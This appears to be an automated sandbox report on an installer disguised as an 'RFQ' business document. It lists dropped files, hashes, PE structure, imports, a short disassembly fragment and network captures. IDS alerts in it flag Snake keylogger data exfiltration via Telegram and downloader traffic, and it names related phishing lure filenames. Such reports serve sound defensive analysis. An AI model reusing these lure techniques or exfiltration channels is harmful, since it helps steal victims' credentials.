                                                                                                          SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                          MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                          SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                          SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                          SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                          Process:C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                          Category:dropped
                                                                                                          Size (bytes):210366
                                                                                                          Entropy (8bit):1.240975322465592
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                          MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                          SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                          SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                          SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................
                                                                                                          Process:C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):363811
                                                                                                          Entropy (8bit):1.2512349423386382
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                          MD5:BFEA15C03AB295424981A73637A19491
                                                                                                          SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                          SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                          SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                          Malicious:false
                                                                                                          Preview:...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............
                                                                                                          Process:C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11776
                                                                                                          Entropy (8bit):5.655335921632966
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                          MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                          SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                          SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                          SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: PAYMENT ADVICE TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: PURCHASE ORDER TRC-0909718-24_pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: SWIFT091816-24_pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: SWIFT09181-24_pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                          • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                          • Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse
                                                                                                          • Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse
                                                                                                          • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1168
                                                                                                          Entropy (8bit):3.257626688482366
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:8wl0asXowAOcQ/tz0/CSL6/cBnwgXl341DEDeG41DED9RKQ1olfW+kjcmAaqWuTE:8xLDWLrFPjPZ9izZMq0pdqy
                                                                                                          MD5:EB454D916DAD9C1F7A790D9D436B9F60
                                                                                                          SHA1:D896E9721F7BB6EE69BC6C7F7A56A0B3F21D6941
                                                                                                          SHA-256:AB81A39654327A619ECA7225313C5D446DCF54F829534FD1A61FAFF89EF4CE0B
                                                                                                          SHA-512:6FDA2F6A12E1C036E7492EBD98164B01FFF9919A05C9152F317D72A024DE0222B1E85360ADB1C30E17D93C8E5C4A4D7E62F0E6CB5BDB15F401017F7A9A900085
                                                                                                          Malicious:false
                                                                                                          Preview:L..................F........................................................m....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.U.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.\.K.h.a.n.s.............y.............>.e.L.
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Entropy (8bit):7.966394496701673
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:RFQ December-January Forcast and TCL.exe
                                                                                                          File size:501'968 bytes
                                                                                                          MD5:65eea9949b624401ea78aaf28072ab3f
                                                                                                          SHA1:fbbe105c42a0ad822625a5242d854357f956886c
                                                                                                          SHA256:32fb0b39f4243593925572e1ea32d1bd21e72a8c0022a12c6c8025da20b7ffb2
                                                                                                          SHA512:e69ca3c97573d5a60b38b764ceadc37420ea069d6850bf5457463579341792dd72612c364af733ff97b08eee5ed2520fc258a0d0b451961deb733ef3deac0654
                                                                                                          SSDEEP:12288:I5A0bwojpe9Ic0h0mdkHApqk90HINf0s1nriyiu7Jj1JK8s5FEeKR:Z0sojp4IZhfqHApZOizgu7Jj1JiceY
                                                                                                          TLSH:05B423109140E57BFA678B754D326AAF6ABF99054A34AF5F87242D0E3C31F93C43626C
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                                                                                          Icon Hash:3d2e0f95332b3399
                                                                                                          Entrypoint:0x4032a0
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                                          Instruction
                                                                                                          sub esp, 000002D4h
                                                                                                          push ebp
                                                                                                          push esi
                                                                                                          push 00000020h
                                                                                                          xor ebp, ebp
                                                                                                          pop esi
                                                                                                          mov dword ptr [esp+0Ch], ebp
                                                                                                          push 00008001h
                                                                                                          mov dword ptr [esp+0Ch], 0040A300h
                                                                                                          mov dword ptr [esp+18h], ebp
                                                                                                          call dword ptr [004080B0h]
                                                                                                          call dword ptr [004080ACh]
                                                                                                          cmp ax, 00000006h
                                                                                                          je 00007F435176D683h
                                                                                                          push ebp
                                                                                                          call 00007F43517707C6h
                                                                                                          cmp eax, ebp
                                                                                                          je 00007F435176D679h
                                                                                                          push 00000C00h
                                                                                                          call eax
                                                                                                          push ebx
                                                                                                          push edi
                                                                                                          push 0040A2F4h
                                                                                                          call 00007F4351770743h
                                                                                                          push 0040A2ECh
                                                                                                          call 00007F4351770739h
                                                                                                          push 0040A2E0h
                                                                                                          call 00007F435177072Fh
                                                                                                          push 00000009h
                                                                                                          call 00007F4351770794h
                                                                                                          push 00000007h
                                                                                                          call 00007F435177078Dh
                                                                                                          mov dword ptr [00434F04h], eax
                                                                                                          call dword ptr [00408044h]
                                                                                                          push ebp
                                                                                                          call dword ptr [004082A8h]
                                                                                                          mov dword ptr [00434FB8h], eax
                                                                                                          push ebp
                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                          push 000002B4h
                                                                                                          push eax
                                                                                                          push ebp
                                                                                                          push 0042B228h
                                                                                                          call dword ptr [0040818Ch]
                                                                                                          push 0040A2C8h
                                                                                                          push 00433F00h
                                                                                                          call 00007F435177037Ah
                                                                                                          call dword ptr [004080A8h]
                                                                                                          mov ebx, 0043F000h
                                                                                                          push eax
                                                                                                          push ebx
                                                                                                          call 00007F4351770368h
                                                                                                          push ebp
                                                                                                          call dword ptr [00408178h]
                                                                                                          Programming Language:
                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x11e0.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .ndata0x350000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0x5d0000x11e00x120020639f4e7c421f5379e2fb9ea4a1530dFalse0.3684895833333333data4.485045860065118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_BITMAP0x5d2680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                          RT_ICON0x5d5d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                          RT_DIALOG0x5d8b80x144dataEnglishUnited States0.5216049382716049
                                                                                                          RT_DIALOG0x5da000x13cdataEnglishUnited States0.5506329113924051
                                                                                                          RT_DIALOG0x5db400x100dataEnglishUnited States0.5234375
                                                                                                          RT_DIALOG0x5dc400x11cdataEnglishUnited States0.6056338028169014
                                                                                                          RT_DIALOG0x5dd600xc4dataEnglishUnited States0.5918367346938775
                                                                                                          RT_DIALOG0x5de280x60dataEnglishUnited States0.7291666666666666
                                                                                                          RT_GROUP_ICON0x5de880x14dataEnglishUnited States1.2
                                                                                                          RT_MANIFEST0x5dea00x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                          DLLImport
                                                                                                          KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                          USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                          ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-12-18T09:51:47.011616+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736172.217.17.46443TCP
                                                                                                          2024-12-18T09:51:54.919930+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738158.101.44.24280TCP
                                                                                                          2024-12-18T09:52:03.732495+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738158.101.44.24280TCP
                                                                                                          2024-12-18T09:52:05.808790+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449752149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:07.373361+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449757158.101.44.24280TCP
                                                                                                          2024-12-18T09:52:09.325974+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449758149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:12.665699+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449769149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:16.296271+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449777149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:19.981105+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449788149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:23.826079+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449800149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:27.776272+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449812149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:31.173451+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449819149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:34.620820+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449831149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:38.101320+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449843149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:41.586605+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449850149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:44.961373+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449862149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:48.314478+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449869149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:51.698398+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449881149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:55.057064+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449889149.154.167.220443TCP
                                                                                                          2024-12-18T09:52:59.049907+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449900149.154.167.220443TCP
                                                                                                          2024-12-18T09:53:02.514487+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449912149.154.167.220443TCP
                                                                                                          2024-12-18T09:53:06.047224+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449920149.154.167.220443TCP
                                                                                                          2024-12-18T09:53:09.391789+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449931149.154.167.220443TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 18, 2024 09:51:44.270340919 CET49736443192.168.2.4172.217.17.46
                                                                                                          Dec 18, 2024 09:51:44.270371914 CET44349736172.217.17.46192.168.2.4
                                                                                                          Dec 18, 2024 09:51:44.270462990 CET49736443192.168.2.4172.217.17.46
                                                                                                          Dec 18, 2024 09:51:44.291533947 CET49736443192.168.2.4172.217.17.46
                                                                                                          Dec 18, 2024 09:51:44.291551113 CET44349736172.217.17.46192.168.2.4
                                                                                                          Dec 18, 2024 09:51:45.983880997 CET44349736172.217.17.46192.168.2.4
                                                                                                          Dec 18, 2024 09:51:45.983963966 CET49736443192.168.2.4172.217.17.46
                                                                                                          Dec 18, 2024 09:51:45.984982014 CET44349736172.217.17.46192.168.2.4
                                                                                                          Dec 18, 2024 09:51:45.985058069 CET49736443192.168.2.4172.217.17.46
                                                                                                          Dec 18, 2024 09:51:46.281352997 CET49736443192.168.2.4172.217.17.46
                                                                                                          Dec 18, 2024 09:51:46.281369925 CET44349736172.217.17.46192.168.2.4
                                                                                                          Dec 18, 2024 09:51:46.281827927 CET44349736172.217.17.46192.168.2.4
                                                                                                          Dec 18, 2024 09:51:46.285278082 CET49736443192.168.2.4172.217.17.46
                                                                                                          Dec 18, 2024 09:51:46.289884090 CET49736443192.168.2.4172.217.17.46
                                                                                                          Dec 18, 2024 09:51:46.331330061 CET44349736172.217.17.46192.168.2.4
                                                                                                          Dec 18, 2024 09:51:47.011548996 CET44349736172.217.17.46192.168.2.4
                                                                                                          Dec 18, 2024 09:51:47.011610031 CET49736443192.168.2.4172.217.17.46
                                                                                                          Dec 18, 2024 09:51:47.011630058 CET44349736172.217.17.46192.168.2.4
                                                                                                          Dec 18, 2024 09:51:47.011677027 CET49736443192.168.2.4172.217.17.46
                                                                                                          Dec 18, 2024 09:51:47.011774063 CET49736443192.168.2.4172.217.17.46
                                                                                                          Dec 18, 2024 09:51:47.011818886 CET44349736172.217.17.46192.168.2.4
                                                                                                          Dec 18, 2024 09:51:47.011867046 CET49736443192.168.2.4172.217.17.46
                                                                                                          Dec 18, 2024 09:51:47.265336990 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:47.265383959 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:47.265455008 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:47.265738964 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:47.265753031 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:48.966967106 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:48.967056990 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:48.979568005 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:48.979618073 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:48.980293989 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:48.980381966 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:48.983793020 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:49.031335115 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:51.834207058 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:51.834304094 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:51.848018885 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:51.848104000 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:51.952724934 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:51.952825069 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:51.952919960 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:51.953005075 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:51.956739902 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:51.956790924 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.023227930 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.023317099 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.027128935 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.027194977 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.027215004 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.027272940 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.033428907 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.033497095 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.040791035 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.040858030 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.042254925 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.042318106 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.050091982 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.050162077 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.054198027 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.054260015 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.059638977 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.059705973 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.067898989 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.067965031 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.071839094 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.071901083 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.081917048 CET44349737172.217.17.65192.168.2.4
                                                                                                          Dec 18, 2024 09:51:52.081979990 CET49737443192.168.2.4172.217.17.65
                                                                                                          Dec 18, 2024 09:51:52.084597111 CET44349737172.217.17.65192.168.2.4
